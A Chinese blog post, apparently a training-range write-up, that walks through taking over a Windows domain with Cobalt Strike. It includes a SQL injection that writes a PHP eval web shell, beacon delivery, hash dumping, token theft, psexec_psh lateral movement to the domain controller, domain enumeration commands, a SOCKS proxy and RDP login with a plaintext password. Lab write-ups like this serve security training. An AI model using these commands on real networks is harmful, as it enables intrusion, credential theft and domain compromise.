【封神台】Cobalt strike自动化拿域控

前言

  • 掌控安全里面的靶场内网渗透,练练手!

实操

环境:http://afsgr16-b1ferw.aqlab.cn/?id=1

工具:CobaltStrike 3.14 学习

最近学习CobaltStrike,所以写一篇关于CobaltStrike的姿势

上篇文章都讲过了就不赘述了,拿到shell上蚁剑

1
http://afsgr16-b1ferw.aqlab.cn/?id=1.1 union select 1,"<?php eval($_REQUEST[gylq]);?>"  into outfile 'C:/phpstudy/www/shell.php'

image-20210825125125629

②蚁剑连接,发现权限很低

image-20210825125351402

CobaltStrike超简单拿域控

由于大部分师傅可能都不知道CobaltStrike是啥,我说一下怎么开teamserver,和启动CobaltStrike,具体原理请百度

一、启动CobaltStrike

1、先将CobaltStrike放入kali中,然后启动teamserve命令

1
./teamserver 192.168.1.105 123456

image-20210910190706634

2、在我的电脑中启动CobaltStrike,连上50050端口密码123456,主机是我们刚刚设置的ip地址也就是kali的ip地址,具体看图

image-20210910190843123

二、脚本web传递拿beacon

1、打开监听器,反弹http的beacon,监听我们内网穿透的端口和地址

image-20210910191104374

2、在攻击里面找到脚本web传递

image-20210910191004064

2、按图设置

image-20210910191134314

3、将生成的代码保存起来

image-20210910191211759

4、在蚁剑中执行这段代码就可以拿到shell了

image-20210910191237891

5、接着CobaltStrike自动就上线了

image-20210910191330778

6、提权就成功了选择自己一开始的监听器

image-20210910191401692

7、接着就反弹一个system的beacon

image-20210910191440237

8、这里可以转到msf探测一下C段,但是我们已经知道10.0.1.8这个ip,可以直接hash传递得到beacon,先制作一个令牌

①先hashdump导出hash

image-20210910191706672

②制作令牌就会自动获取我们刚刚导入的hash

image-20210910191725856

③记得选择admin开头的接着令牌就成功了

image-20210910191929958

9、利用令牌直接hash传递拿到10.0.1.8这台机子的system权限

①设置一个监听直连smb,端口随意

image-20210910192200382

②执行下面命令

1
psexec_psh 10.0.1.8 smb-beacon

image-20210910192238867

③接着10.0.1.8这台机子就上线了,smb形式就是445端口

image-20210910192308245

三、拿域控之前的CobaltStrike命令积累学习

由于我们知道域控机子ip就是10.0.1.6,上篇文章讲过了,就不复述的去实践扫描了,直接开始命令学习

1、查看当前用户组

1
shell whoami/groups

image-20210910192520024

2、查看域

1
shell net view /domain

image-20210910192559695

3、枚举域内主机

1
2
shell net view /domain:GYLQ
shell net group "domain Computers" /domain #这个也可以

image-20210910192730087

4、查看DC域控主机

1
2
shell net group "domain Controllers" /domain
shell nltest/dclist:GYLQ #也可以

image-20210910192947731

5、查看DC的ip

image-20210910192836844

6、查看域的信任关系

image-20210910193026550

7、powershell导入power-view模块,去github找一个powertools,这部分只是学习命令,可以跳过

image-20210910193230115

1
powershell Invoke-ACLScanner //查看域的信息

image-20210910193456464

2、查看共享文件夹情况

1
powershell Invoke-ShareFinder

image-20210910193617172

四、CobaltStrike自动化拿域控?

上面的漫长的废话搞完了,接下来实操。

1、打开文件管理,看到域控有登陆过这台机子,刚好我们换成域控权限,PID是1796

image-20210910193935194

2、盗取token

image-20210910194011043

3、利用共享文件夹发现可以访问域控的C盘了,这时能拿域控的方法太多,我随便选一个

image-20210910194043684

4、直接用拿10.0.1.8的方法拿10.0.1.6,简直不要太简单了好吧,我上篇文章还要转来转去,接着DC就上线了。

1
psexec_psh 10.0.1.6 smb-beacon

image-20210910194754682

5、怎么进人域控的桌面,接着挂个socks代理

①进入这里

image-20210910195125669

②接着socks1080

image-20210910195149475

③然后将其中的一个管理员的密码改成testTEST123

image-20210910195456209

④利用proxychains4代理连上去,不懂看上篇文章,写的很详细

1
proxychains4 rdesktop -u administrator -p woshifengge1. 10.0.1.8

image-20210910195641421

总结

最近学了CobaltStrike才知道这就点几下就拿域控了,不需要复杂的命令。下次加油。

我的个人博客

孤桜懶契:http://gylq.gitee.io

本文标题:【封神台】Cobalt strike自动化拿域控

文章作者:孤桜懶契

发布时间:2021年09月10日 - 18:53:55

最后更新:2022年05月20日 - 11:47:45

原始链接:https://gylq.gitee.io/posts/131.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------